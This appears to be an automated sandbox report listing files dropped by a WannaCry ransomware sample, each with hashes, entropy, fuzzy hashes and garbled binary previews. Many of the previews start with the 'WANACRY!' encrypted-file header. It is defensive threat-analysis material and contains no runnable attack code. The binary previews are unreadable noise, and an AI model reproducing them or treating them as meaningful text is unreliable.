                                                                              SHA1:E999584242D2F21830CCFDA44A48121AF4ED49C1
                                                                              SHA-256:107EB7513F48F5C183B1A450FB784827186B02D749A0BC1850299687351F83E1
                                                                              SHA-512:025CCEA4799701C4623BFBF326F103E968F3755A153D7497749DAED5A66D51686BB20AC07770BCF647D505BAA20CA18425B56B1C13927C54C27CAD95A1E2420A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....@U.Eo.w.Z.....B..St..!A.IT..Q*.%......t..|.B2......KK.0....B3^./..$.".4......L..J..,..:.&G.M1..A..m.YD......n.<.'..{C.{q...V...R....(........;...x....^.?...(."..`l...#.1:6.V..K|.(TR...l.A.^...'>Yy.-NW.l....r..e..)N.t...k......jB....l..Z.~].9...............B.<.{:...W...>..=.+..h..{ ..0)..l.[.....lN..97..?R.}....%S.T.T=r...?3.Q.~.x.J0.]G~+:z......`...qO..}B.5..R.K0.._.F.c..H.E~...Ic..6..j '......~.B7...F&BuL-..N<..$^."..9.z...a2..o.5 k.I.B.W|.X.....< ..%....W.. .x.a.E...W.....]..8F.....Y..qvtd......N.S..FW.cZ..R?;.%k.l..D2...@...l....fX=d.t.\/.$]..O.6...,.....27w..".U.Sq..;...L.z.l.VOf/.c1...j...Y..q.....".MV....p......OQQ.U.&LyR....G....X=0....*..ko..U..*.>h.e.R.}g...e.9.}...k.)..W..[fy..M...=..S........p..."....8....lW.&......#...m}`|R4.......(.qu`r..y...b:.a..b6....J....'.l.....x....I...O.....HR.. ....u..w.Mw'.iO>.t..@.."}._.k!.cl.E1/....A.I{....D..bi_....;...~5......!.|.....(...d...7..l;.].m.5..."....So.K......#,..5..:..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801530169081064
                                                                              Encrypted:false
                                                                              SSDEEP:24:n8L2BlCcgN2qQL0FcZ6lEJ2Tf/vGjz85ryQnLyotszCqj2jZ:n8cCdNQecZ664f/ejz8vnLyAJjZ
                                                                              MD5:8CE0FB4591C3F5231BD04BEB7AC60439
                                                                              SHA1:B3E2B91F33F944AB57EB6B0E7BA670F602DB4CB2
                                                                              SHA-256:4832F9777F775F19E53DE83FC7C4F6B58EB20271972056C9F2474299B7C6EA79
                                                                              SHA-512:7CF51567A0E14F471358FF8F4B04C0093F2123B2FD536517518692BB71492E408CE05C917F40E904A68A6284A0E5568D775B349FED09EF0318D2C2702FD0056E
                                                                              Malicious:false
                                                                              Preview:$.......0..W:J?s..s...F..r.r3....Lg.8.^.+J..bJn..j@@..{..&...<i...j...$I^.....^.L.~6..[.A.....t'....Mm...f~j.J^.x...~.f ...F[.....V.Jz..TX^.W.v/v.. .....Fu..H..t}.v/.X..\'.I...c.*P......Ma..3(.G..jS....x.,|s.d...>....e..r....6lD.}..h..l.&.?h.-....ik.;..^.P.'. ...Y_t_k.....&.b................e[.I.2.u..o...i.mk....ev.O}.q.u..4.M..%h../s|9Me.....z<0..f . ...Q/..s...|.?{...n"vL./:u.....rY.....r..z..s.d]....w.2..d......Z....?..o..H.....8.......I..9.{.........i.."B.x.P..|;.."hC..c....].&vE)..........."..$)t......G.g..U......j.;...0p1.11G:.%.xQP.h.9..........a....$..`..k.*..1D/l..)....r....8.......Q<"...nP~.,...:.gN..-..".N...4..6'.\.|..<e...(<..ro._:J9...=...j.%(..OA.h..6...[...VH.9..7.l.t..N..u....{.....iC0.An*}.li....\...i..^3.?..<...H{.....J..?I....b....7..b.Bbg....)?.#._....9R.>.'.\.T.7.k7LF"h}*...9J.Y'...C.jP~.L2D.....b......;...8@D#.}..-.[...-$.C.|.R'b..<!..5..5.o......E.z..u..9%.oXMH..:jNap."Hq....<..LgV7.om(..pU.&...T....K...~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.817563997060955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkex6HzVRS0tlQmdsxvK3ZQsGPXyNy0ZZpW93TRTxjJZzwRF2KEbxHsi:bk86HBISC69trA3TRTx7c72KENHx
                                                                              MD5:0A960CBCB627D6DA88A036A7666732BE
                                                                              SHA1:492C4240419FD51B63E6187D881BC9CB9D71EC07
                                                                              SHA-256:E29E5AD4E93F1CA626B750FF437DCCF80DB362CCAAF82135043C9ED5518D2CF9
                                                                              SHA-512:D5CDC09095131E9820BCA0ED277681F1B01EEA0E4879794302416D6BA716ECAB20CC5A7265AEC1123B77B88448FBA24C0E8FA607B974E33F6E4CA1DDC850653C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......p...+yu.1..........W..5..m....NS4. .zfJ ~$U.&#'U&S!Fp.PF...x.........7..E.w.e.m..g...o....O.~........J%&....k.si........d1....G...O.$Y...*7.O...+.............u...%..Vg...!8....xdC.N...D.@.#.~3...>Q....d.l."c.^=J.z.mB.L.QmA.3....^..@.6{..................m........'..j..-.......W...o|....n..J.J9.S........m.t..[.x}.{.Hu.*.......)....".^x.>.3....T...d.n..A..1.CW.p|Nq!..m4.=..&.CR1..B. ...3....;..L...s..zQ%C...2.........#...(..s..".l-...8.......ux..+....D..^./].]..Ip...W....P.e.wgFX4.k.6.v.s.....64........E.=.._..zHw .X...^..-.lzkh.W9S.......z.:..sBJ..%.......\.=,..........'.".....3.......I...H..h..k.*...f...K....WQq..6.<.z..1...O:jS^.......I...9*...rE..e.6Xr....xo.z...g.h..B?.J...E!...U..rp#wh..Q0Ea.4...m...3.+o.H..>........D.F_k-w.1iC...^......9.. pzHX...:Qu?8....Cv:..MbP.m..s.O..T.../...q,.q.T...........a... .J.Y..oC.#.r..VXl....*.6.....]p..v.........ku.<.I...n..+.....G......o..%!..XX.OH...+.{.H.I............kVhp^.5."
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.817563997060955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkex6HzVRS0tlQmdsxvK3ZQsGPXyNy0ZZpW93TRTxjJZzwRF2KEbxHsi:bk86HBISC69trA3TRTx7c72KENHx
                                                                              MD5:0A960CBCB627D6DA88A036A7666732BE
                                                                              SHA1:492C4240419FD51B63E6187D881BC9CB9D71EC07
                                                                              SHA-256:E29E5AD4E93F1CA626B750FF437DCCF80DB362CCAAF82135043C9ED5518D2CF9
                                                                              SHA-512:D5CDC09095131E9820BCA0ED277681F1B01EEA0E4879794302416D6BA716ECAB20CC5A7265AEC1123B77B88448FBA24C0E8FA607B974E33F6E4CA1DDC850653C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......p...+yu.1..........W..5..m....NS4. .zfJ ~$U.&#'U&S!Fp.PF...x.........7..E.w.e.m..g...o....O.~........J%&....k.si........d1....G...O.$Y...*7.O...+.............u...%..Vg...!8....xdC.N...D.@.#.~3...>Q....d.l."c.^=J.z.mB.L.QmA.3....^..@.6{..................m........'..j..-.......W...o|....n..J.J9.S........m.t..[.x}.{.Hu.*.......)....".^x.>.3....T...d.n..A..1.CW.p|Nq!..m4.=..&.CR1..B. ...3....;..L...s..zQ%C...2.........#...(..s..".l-...8.......ux..+....D..^./].]..Ip...W....P.e.wgFX4.k.6.v.s.....64........E.=.._..zHw .X...^..-.lzkh.W9S.......z.:..sBJ..%.......\.=,..........'.".....3.......I...H..h..k.*...f...K....WQq..6.<.z..1...O:jS^.......I...9*...rE..e.6Xr....xo.z...g.h..B?.J...E!...U..rp#wh..Q0Ea.4...m...3.+o.H..>........D.F_k-w.1iC...^......9.. pzHX...:Qu?8....Cv:..MbP.m..s.O..T.../...q,.q.T...........a... .J.Y..oC.#.r..VXl....*.6.....]p..v.........ku.<.I...n..+.....G......o..%!..XX.OH...+.{.H.I............kVhp^.5."
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.815012852581599
                                                                              Encrypted:false
                                                                              SSDEEP:24:xLZi+9sg3jPQ10lWTYIJ9Cc2s1PaBOAR/rRt95NM:xL59R37WTY4N2spacARDRttM
                                                                              MD5:8CDB909AC00ABE51F04F2292069CD563
                                                                              SHA1:6E89B165A7240D30187A839E2430A2E64232BD57
                                                                              SHA-256:202CBE380A4D4312CD3D4F2CEA56FF0715C849C1AAFAF5664B44AC464D66F959
                                                                              SHA-512:1A8268C61E32F022EA427BE01CCB50291863938DAB3951D8B69D2FDBC41ED88663CCE88AC9567FCC27ED8E16853496199A4E4A0234DE46ACBDBE39048E370571
                                                                              Malicious:false
                                                                              Preview:....'..sH..QG~.._...|T...9.=...}.E..D`G+.#......}sV..8..BX1..6bN....."6m>.O.gJ/..........[D...pT:.@..8......t.b.y.Ke..t.o&.R....U...C........Oo"..4y.Xq..#..j...~N...UJ....DAt./.T@.9...)..3.M..............R~M9 *^.,V......K....TD.....".E.J!..`.a.,.hy=..V....K..h....X....e...#...r.-..dHQ.uB..T..j.*Gd./{/..n..U.G.....J...,-.0.4..83!>..0...we..hJ..h.TT,s..,lm.)+.].?%(IB&Q.X>....U.....H..|}...H`.....+.6!......7\....R..>o[...6K)..........![.:s}g.Ip...... #..(q....k..V....3.n/.......i...C...%.Y.......%...<..S...&..@.N....}B.t..A.W2Q....5.Zx%\..\`J.t37HQ........[Z...*>.."..eS.e .V..?.&\..G9G.?a+......6.a.....B....I.,..7...b....->..B...N.:..?..H..1....[..t...XD.|...F...jn...O.X....$r.....Om.i.$x.,(..&...U].H.....3..U..C..fe5q.(..p+}!..6.^..............*...S.8...op^G..Xq..I......I@.].<..r..A..{..5.<.....+.. .h.w.I.R.[;...T.-.....Bi......*.`..;...#.ev....="..em.O.(.&.!_.U.!..].......7O|.w}t.l8...]|f..X..+.Jh.gu.3...s...z.G...`y.a..S].7..P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8458900123497175
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNVbbuiA19LwyY0HkWcMKQzM1U5+Jh6SdCPgqaV4WnV6aCxDo6Yo9:bk/6iWBwpjMPzMu5+vVaI4++xDYO
                                                                              MD5:6B54D761992CF8D1A95F51D4F1F4AAA2
                                                                              SHA1:21B570521290AED35202916BA873A05615AC16B4
                                                                              SHA-256:6C40F4FBA51AABE87925FAF6FFDA6D52A1BAFD4E568891252104733B2BB2754C
                                                                              SHA-512:A7262871C9BEAC12DA7942AAADBD70792340F7B06D9694CD8DE084A1DA66983FF0606726E5960AA5639D4FBA211E753EC2B8BA32EC819A6AFC58E2E580D06031
                                                                              Malicious:false
                                                                              Preview:WANACRY!....K..`.a..=.IC..,....X.....4.....uP..%X..w..#.....A\k$.>......^..8.w..Q..D.....vh...Z..w..*...V.F.......Wp..*.%.7j..v...x^;...e]YDj....)..+...'.]0?XH.TL.5.....#..L..B(Z:.;.~...&.....3*..{.4..5A..B@../...tF..#Pn.@A.....e.j}.v..b.ak:-.-...G&......m.............ul.(d+.9..M...........t~...F....<....E_..c<wm..6......1...?..o..4.,.W-....-.:.Fr.........d4.c..X...y.E!]..Z. .........m..yI..8\.A*..w.......t.7...q.I..m.R&..@=....E@...J.2...b.Vsf%SP..)L...A........nGC.U...Y.M1.z.hvC&..L*...g.?.7.....m..X7_.~.4..x$y./...T....{Y.*../..D6E.....3Q..#.o.2..I.........E9Y&$....Zz.....7...dds.j...k..[..........&.".....^.p.G|..._N...@d'......I.ND .{.D...y.{...b.b,....W..!.v....ru.+kT..A.........d.4...e.G...(}.D.}l."..F..Q.b..Y..u.?.8.....A..:x.Gp.2/.....:F.T\.L.97...y....Hz!3.x....#..\..b....-@......nc.......#.W. ..."....m.z.P.a.m.>.KO.W..U..(.7..|b.,s...j.Z)......$wT.o...a.g,.J.w.m.....W..RG....x....T....$.kK..Y.B.....:zv...f."....S..w.Y=.>..:.|.-. ...^..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8458900123497175
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNVbbuiA19LwyY0HkWcMKQzM1U5+Jh6SdCPgqaV4WnV6aCxDo6Yo9:bk/6iWBwpjMPzMu5+vVaI4++xDYO
                                                                              MD5:6B54D761992CF8D1A95F51D4F1F4AAA2
                                                                              SHA1:21B570521290AED35202916BA873A05615AC16B4
                                                                              SHA-256:6C40F4FBA51AABE87925FAF6FFDA6D52A1BAFD4E568891252104733B2BB2754C
                                                                              SHA-512:A7262871C9BEAC12DA7942AAADBD70792340F7B06D9694CD8DE084A1DA66983FF0606726E5960AA5639D4FBA211E753EC2B8BA32EC819A6AFC58E2E580D06031
                                                                              Malicious:false
                                                                              Preview:WANACRY!....K..`.a..=.IC..,....X.....4.....uP..%X..w..#.....A\k$.>......^..8.w..Q..D.....vh...Z..w..*...V.F.......Wp..*.%.7j..v...x^;...e]YDj....)..+...'.]0?XH.TL.5.....#..L..B(Z:.;.~...&.....3*..{.4..5A..B@../...tF..#Pn.@A.....e.j}.v..b.ak:-.-...G&......m.............ul.(d+.9..M...........t~...F....<....E_..c<wm..6......1...?..o..4.,.W-....-.:.Fr.........d4.c..X...y.E!]..Z. .........m..yI..8\.A*..w.......t.7...q.I..m.R&..@=....E@...J.2...b.Vsf%SP..)L...A........nGC.U...Y.M1.z.hvC&..L*...g.?.7.....m..X7_.~.4..x$y./...T....{Y.*../..D6E.....3Q..#.o.2..I.........E9Y&$....Zz.....7...dds.j...k..[..........&.".....^.p.G|..._N...@d'......I.ND .{.D...y.{...b.b,....W..!.v....ru.+kT..A.........d.4...e.G...(}.D.}l."..F..Q.b..Y..u.?.8.....A..:x.Gp.2/.....:F.T\.L.97...y....Hz!3.x....#..\..b....-@......nc.......#.W. ..."....m.z.P.a.m.>.KO.W..U..(.7..|b.,s...j.Z)......$wT.o...a.g,.J.w.m.....W..RG....x....T....$.kK..Y.B.....:zv...f."....S..w.Y=.>..:.|.-. ...^..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801076213827644
                                                                              Encrypted:false
                                                                              SSDEEP:24:yNd0M3y2dJUUAnqDuqGULXunIevWMC3DrIFmQ6P:yNdFdJmqaTnIC8T0F1o
                                                                              MD5:E266080CA876FEF58DE7DDC1FD40E4E9
                                                                              SHA1:4D37D4591360D083E4D5B862A166C03C6F735801
                                                                              SHA-256:A95FD3C94BD305D0C977BAE7CD865DCDE5D1FD403C2AE9477F8F162EAED8924A
                                                                              SHA-512:80D8ADCDD3DABF3D050722417C533E2E5467FC74DD4E9732EE0D24075CF19B49109C843F882A19AA8CCF92BB24013453FF66B4D025B84B29AA4738ACBF925F23
                                                                              Malicious:false
                                                                              Preview:..J?...)1.....[................c..p(....V..v.......@b.1 Aj....c.....yw..*z...{X....al.?...s.wg.J...}a...<...x.......8<.[A.A..5.~.......>........Q<.|.;.2...".]J.h.&..f-..}.. .Q.0........G.7'.*./.....,..j......42-....p[...m~*W.}a...DLU^..?......B.#.f`......{.jw>M..>..r....p[..........$.P../........7C......../P...$<.m3..{..,.0w3.....wk.m...7..K....... u.IeF.:...x....".u2p|Sg....`G\."|.`.s..U..W....W[P.M.K...eO+..m<....k....Iz..R..k...u.....G..&.h[%.Q2..:.r/3.R....eA.....0....=.f.)B..E<..8.>.c....z...?F|.[.K_..j).=..hf.s&<....p3f.H..V...OL...../...Dn%.Np.^pC.."..>.O.c.....!.'.P;...U.|....W...F.&..R.#.t..!i.{FC.h .1..C....l...$i..2.^.O..?..~8.+.^E.[.....G.....[..Y.xO..x./"e.l...K}..ak.......r....g.....}.E.Ps1V....XW.c8..G,F.......i{...y.#0.O.R.9...U...>.ml.....X&.|..iN-....4.t....vp.....m.2L7..$.......';.,...I'.v(.#..?....gW.-.*_V.!.x..m...*..c8...../.I.$.P_T,Ax.3pr...tP_.@I.H.~...tbZ-.I.xV.p-.Ru.i.....DX..].?s...x....}..S...y>...?_....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846671130696112
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkBQu8Z7TPYpdG/wagWD1Z2mf6NruveTsuFrcaZm+IGYBOQ8umq65:bkr8WD+gWl+BTsuxcwm+NYgQNmqa
                                                                              MD5:ECB72341FD7F9811CF2B06185B856C89
                                                                              SHA1:F6CD6CAC4CB427E1BC9EAEF524CE9AE05EB670F1
                                                                              SHA-256:5C50D480CFF00D06A027D9A7871B37A4BC345D48B325B8253D806AF01306C135
                                                                              SHA-512:00900A3496C78C555C220F1D2E9B2913C2776D13873298E3CC4178325443EC791B102F3392C8C2774284E994F32EC9598C79D53564E486E704B17EF2018ADDC1
                                                                              Malicious:false
                                                                              Preview:WANACRY!............&.Vuh......1..SI...>el\...%..I.A......i.c..5*..]H..s."f..Z.D.E..R...f-.G...t..K.....ZTj\..|.*P.[$y....2.......$.xO....az%..d.2.n..."...K.G...{.V+...x.F.v..{Rtws.`.D......-..)....._.r\.G[O.....1H..~.bj..+w.U.....H......$..#..s".....b..............F...U5.>#>,.#@.>f.+.t.N.*h.Q.D^g.bkj./.b!...<....]=.2.>I.;O:.;.5..{.!.5S..Gi.i.?..6.....'d..w..(6..b....[..?..|!N.4...y..=.....^....`1O..1......n.T...70.p.|..H.i].X..8.U.:..On}.<$....}.:......%.Q$$.t'.M..:3g1.+...7}...X.r..p....g...d..[\".Hvt..k.......CLB....;g...K...:B.`.z.|.......R...(..q.....#...#.....g.r.^....I._.......b..F..}s..9..(iBh4P..Hr.fZ....zU.%W.}....#.[h.A.T..2......`....X.S..dU..-e..1.C.@"..v.....>gv.g..9Py....Qlx.....^.K.l......m.R....<.F....++...h.KS....).9.CIj,yP?y7..v..qd..A3C..R.a...t..BYn....NS..#..z.x.AX.P4.}fMw.n.......1h4.7."{a..z..........{..t.G....Y.`.`..{..}.e9.?..W....kV....kV3..,.......:R^p..T.-I...V...X.#..;.s....@4Q.~Qg.YI.......u!..........>.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846671130696112
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkBQu8Z7TPYpdG/wagWD1Z2mf6NruveTsuFrcaZm+IGYBOQ8umq65:bkr8WD+gWl+BTsuxcwm+NYgQNmqa
                                                                              MD5:ECB72341FD7F9811CF2B06185B856C89
                                                                              SHA1:F6CD6CAC4CB427E1BC9EAEF524CE9AE05EB670F1
                                                                              SHA-256:5C50D480CFF00D06A027D9A7871B37A4BC345D48B325B8253D806AF01306C135
                                                                              SHA-512:00900A3496C78C555C220F1D2E9B2913C2776D13873298E3CC4178325443EC791B102F3392C8C2774284E994F32EC9598C79D53564E486E704B17EF2018ADDC1
                                                                              Malicious:false
                                                                              Preview:WANACRY!............&.Vuh......1..SI...>el\...%..I.A......i.c..5*..]H..s."f..Z.D.E..R...f-.G...t..K.....ZTj\..|.*P.[$y....2.......$.xO....az%..d.2.n..."...K.G...{.V+...x.F.v..{Rtws.`.D......-..)....._.r\.G[O.....1H..~.bj..+w.U.....H......$..#..s".....b..............F...U5.>#>,.#@.>f.+.t.N.*h.Q.D^g.bkj./.b!...<....]=.2.>I.;O:.;.5..{.!.5S..Gi.i.?..6.....'d..w..(6..b....[..?..|!N.4...y..=.....^....`1O..1......n.T...70.p.|..H.i].X..8.U.:..On}.<$....}.:......%.Q$$.t'.M..:3g1.+...7}...X.r..p....g...d..[\".Hvt..k.......CLB....;g...K...:B.`.z.|.......R...(..q.....#...#.....g.r.^....I._.......b..F..}s..9..(iBh4P..Hr.fZ....zU.%W.}....#.[h.A.T..2......`....X.S..dU..-e..1.C.@"..v.....>gv.g..9Py....Qlx.....^.K.l......m.R....<.F....++...h.KS....).9.CIj,yP?y7..v..qd..A3C..R.a...t..BYn....NS..#..z.x.AX.P4.}fMw.n.......1h4.7."{a..z..........{..t.G....Y.`.`..{..}.e9.?..W....kV....kV3..,.......:R^p..T.-I...V...X.#..;.s....@4Q.~Qg.YI.......u!..........>.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.843886909539243
                                                                              Encrypted:false
                                                                              SSDEEP:24:qI3jZIyaZJ4TTgp7Vt9wIS/4wTETnCt6RCG1/LtfTtfv:q2OYTKi8ca3RCG5Ltbtfv
                                                                              MD5:985C9D7A7EC2E77A7B66849AA7FA4D38
                                                                              SHA1:14E01800874BA9CF3D9ED3658A2E31A04A72602B
                                                                              SHA-256:08A473B5A6BCC4EB04B368C106A12B600CF78E478AF2FFF0FBE5234B3884CFB0
                                                                              SHA-512:9479A65A3A078C77AE381647FCB096106ABFC5D695FD6C6F8AA5E0E9756FBE820E20D527EC27363E13F1093CDD8B82214A6783B7DB340C6B29B0A611F6FF49AC
                                                                              Malicious:false
                                                                              Preview:.....n^.a.* I)....8<.r.zy....6+..DA~Y.U&.J...sn.l0Y1... .Dp/......}.d.]qe..Q.]..3...A.......W..........6..f&.&.l.l.C|r...,H..*....JP...Vf.|.v.n.......N......9.p.tG...p.l....w..L...=..M..f...;o6..Zs...ld.e.M..5.}q......,....Q%7.|.y)|{lFg.U.<.)E...$K.c.7E.j.p..D...4.7Nq.I.5.@....S#.B...sc.,n..........O-.......<~.mb!...?..^......t....6f....:W....?4...L...0...)..4...v..:y=.>.9.......i.@k..%0..V.k..@...;zw`......&)h..{.;..E.......eW.(=n.}.WP.-....T....'Rcm.f.w.=.(-.'.$.s.X.LU..04.9.8!3.8..`.:..U.:|K../...%...bq.B......j&.............T..q].JS...?.x....3.j ........=b..A!.....U.D.}Z...SWt....*A...p.w.S0.{....BC..........#....k%.,.....*.y..ts..Pf..T..5.^CM........Z&..K,.4.se..h.q.h...L."....jx.W..X1..t.e..j.s.....P..O.7C.Q.7.g.@E"v.....]....`....X..q....iJ.HN..s...H...wG.Jb5..........3.....s..a.Dm9...#|.k.Cw..B{.%n.$z.&,..l.\h.......h.w....L}.V(..._r.7.v;..fK. ..F h........g...)....H.g.F&..0s...\.q..<%.d......+....C9..E..D8.....+-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839533982371891
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktdeEtx/Q8qNTrXqa01AtdMX6Xo07fepm8Yfmi+uYujHbDWO/Lz/VkyWZDyKc:bkzeEt5HE/XqItdMqXo07tei+Tuj+AHZ
                                                                              MD5:25E676C385A7AA0BB5444ACF223D43EA
                                                                              SHA1:B467776B6EBA7A305AD62EB38B5B202C58D043D1
                                                                              SHA-256:E2FE017C3FEE86AAA041D79A22E986CCF7408AE6D7A181BD0F1CD9806ED49D2A
                                                                              SHA-512:FC37C1007C9CF860B70B8CA28DBEB713E992B4199F88A196C4AEEED81EFAC13EDDB096628B56D3DA3D4682AE4587AD0540BFE8837FA0D4A2979BFD45F7AC7F3D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'{...Mx..W.[..^5.f.g...z..D..1..F.......)_..v....v..s1.6K$....Os.D..<S....`.3o..g...-.r..w.=.`O..&..g.Vn.V...=.?byT.&C....D.....m._.....[.L.R4.k......f....c]s.)n..|f...k..x1.H~4/gz...&$V........~7. ..m[../..[..~..Z.m...`.....c.V.....\.E...u..............#.P...X. ...-.L.....z.w....P..sM.H!...X]..z..`x.?....d.~S...4...nH...."....?.....6..R...#..l;.Za....X..V.....C.....C.T...}.WC i.v...O.U.s"<.40..a..c.M.......{..+..;|..*2$....u..X..$....&..x..DEr.\.9Pf.Ta.P.G.:..&s..R6D.....B..... ...,m........8c.vzj..b..1>...<+n.s...._.2[...R....ig.d<..\+..s.\.?6I-Bz.g.E.p....*.!f.6.&.a.T.{....k.^..=i..W*...S?...f.:....TS`......Pv.....pL...w.6.h.......... .ne.m....m.t...t}.a..F.&{Jt...C.6D.a..1..e.v..9g.M.?.[e(|...w.2...4...**%)a.t..16.2..# ..$|.........s[Ix.l..e....k....|/P.k.2=@.$.;<...v...i=[......V;..6..T..\...dSETK...C..<../.<.[.k8.K..'.j._..)...#:....x.th.S.S..1.z..c..|..9g..r..}../.R\.....hc.B+rL.j..<....+C....I.../V9..E....i.Re...|...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839533982371891
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktdeEtx/Q8qNTrXqa01AtdMX6Xo07fepm8Yfmi+uYujHbDWO/Lz/VkyWZDyKc:bkzeEt5HE/XqItdMqXo07tei+Tuj+AHZ
                                                                              MD5:25E676C385A7AA0BB5444ACF223D43EA
                                                                              SHA1:B467776B6EBA7A305AD62EB38B5B202C58D043D1
                                                                              SHA-256:E2FE017C3FEE86AAA041D79A22E986CCF7408AE6D7A181BD0F1CD9806ED49D2A
                                                                              SHA-512:FC37C1007C9CF860B70B8CA28DBEB713E992B4199F88A196C4AEEED81EFAC13EDDB096628B56D3DA3D4682AE4587AD0540BFE8837FA0D4A2979BFD45F7AC7F3D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'{...Mx..W.[..^5.f.g...z..D..1..F.......)_..v....v..s1.6K$....Os.D..<S....`.3o..g...-.r..w.=.`O..&..g.Vn.V...=.?byT.&C....D.....m._.....[.L.R4.k......f....c]s.)n..|f...k..x1.H~4/gz...&$V........~7. ..m[../..[..~..Z.m...`.....c.V.....\.E...u..............#.P...X. ...-.L.....z.w....P..sM.H!...X]..z..`x.?....d.~S...4...nH...."....?.....6..R...#..l;.Za....X..V.....C.....C.T...}.WC i.v...O.U.s"<.40..a..c.M.......{..+..;|..*2$....u..X..$....&..x..DEr.\.9Pf.Ta.P.G.:..&s..R6D.....B..... ...,m........8c.vzj..b..1>...<+n.s...._.2[...R....ig.d<..\+..s.\.?6I-Bz.g.E.p....*.!f.6.&.a.T.{....k.^..=i..W*...S?...f.:....TS`......Pv.....pL...w.6.h.......... .ne.m....m.t...t}.a..F.&{Jt...C.6D.a..1..e.v..9g.M.?.[e(|...w.2...4...**%)a.t..16.2..# ..$|.........s[Ix.l..e....k....|/P.k.2=@.$.;<...v...i=[......V;..6..T..\...dSETK...C..<../.<.[.k8.K..'.j._..)...#:....x.th.S.S..1.z..c..|..9g..r..}../.R\.....hc.B+rL.j..<....+C....I.../V9..E....i.Re...|...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8122644909164665
                                                                              Encrypted:false
                                                                              SSDEEP:24:4VtgBlPsSIPvkhIvBjGvWvF3MvfMf3ws/3ShDCob20o0:YKRsSIPvYsBSEhGoR/uCodt
                                                                              MD5:1C59DF551D096BD1E240A64AF3F51ABA
                                                                              SHA1:1938DD48770AC732F1F4C96C9ED88356501E28B8
                                                                              SHA-256:212B4F266ECB2751A8C75F56CA28FA78CB226C702E9C9E73A601216B6313E805
                                                                              SHA-512:A4DA0552760FA6A5207D0F99D5522DB8A0D5CD81C300AEE04EE6A8D1C6A3E0422F5E14B04DF9BB38C624A0C40847E69ACCD21C1C2E9FE5D66D5643489104B811
                                                                              Malicious:false
                                                                              Preview:r..v..D...kZ...n.R.G....K@-....v.../_x.OX.aaD...?..y9..p-j..'..^.cnl..9.....4.:hH..-..<..R.jo..U_.n6.LY.z6...!?Y...|(..U....3.Oz}..kz.1..d..JV..1..J.(.T..p..?...+..KLpM.y..'ic#...1.G..T..3q.g.AP}awr...j..5L..*JUH..o..(........kC?.C.e....i=+..S....l.............x...A...%........B.....&.\....l.u.X..I..(ef2U...A.........s........g-.......{P(.z..m..`....d,.N}.~I..Z.5.S..%..Nr..{|.....z.z.N6..O......q.....r.>..*d,..-x....d.l.z..t%/.6...c.tV....L..j...b.A.....70..mm..@...h.....2.g`a.N.Yt.i..*.x.2........2..\..e...7...6.W..g...K/...o`.iP...*..0...l7.-.Ft...._.D..Q.k.|4.k..C0..y.."38.9W.FL...M..../...r.yR%q.D.......n...88[i'......LZ...n..E,.....EqB;.O.g.}..d.Jh.e4..7n^o..n..!.u....x.L....e.e...6....4.!6M..1.e.].#i).).Z..$..F.{~.F9;.#. .k.q...WK..P.P...............x...k.._~.U.ax./....!.D...S..../..j..ie..Q..=.y...RB.h....?.e.U..o...gB..56..H.|.~n..n.....u0./e<>.u...$iF-..|.'Z{.i........@..k.l..w_.....9./.....).G..Y.....\.9.t.}.o.1!..3T."...f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830368654853684
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkAUvAR/hNkIjuqcgB9CPO6Gx720K8g6H/h0iCv2ghfD+/zKsKmivhaW/D5:bkAUIhqQv720KD6Hm1hfD+7K5mXWL5
                                                                              MD5:DA92E40CB82AEF1C0C9A0C32E3E5BD72
                                                                              SHA1:EC361386435B8BD650ACA50BC639136FF5FA4980
                                                                              SHA-256:46C0441311DDA3382B671B5A2E8A23E41857440398833D41885FB734D56BCA13
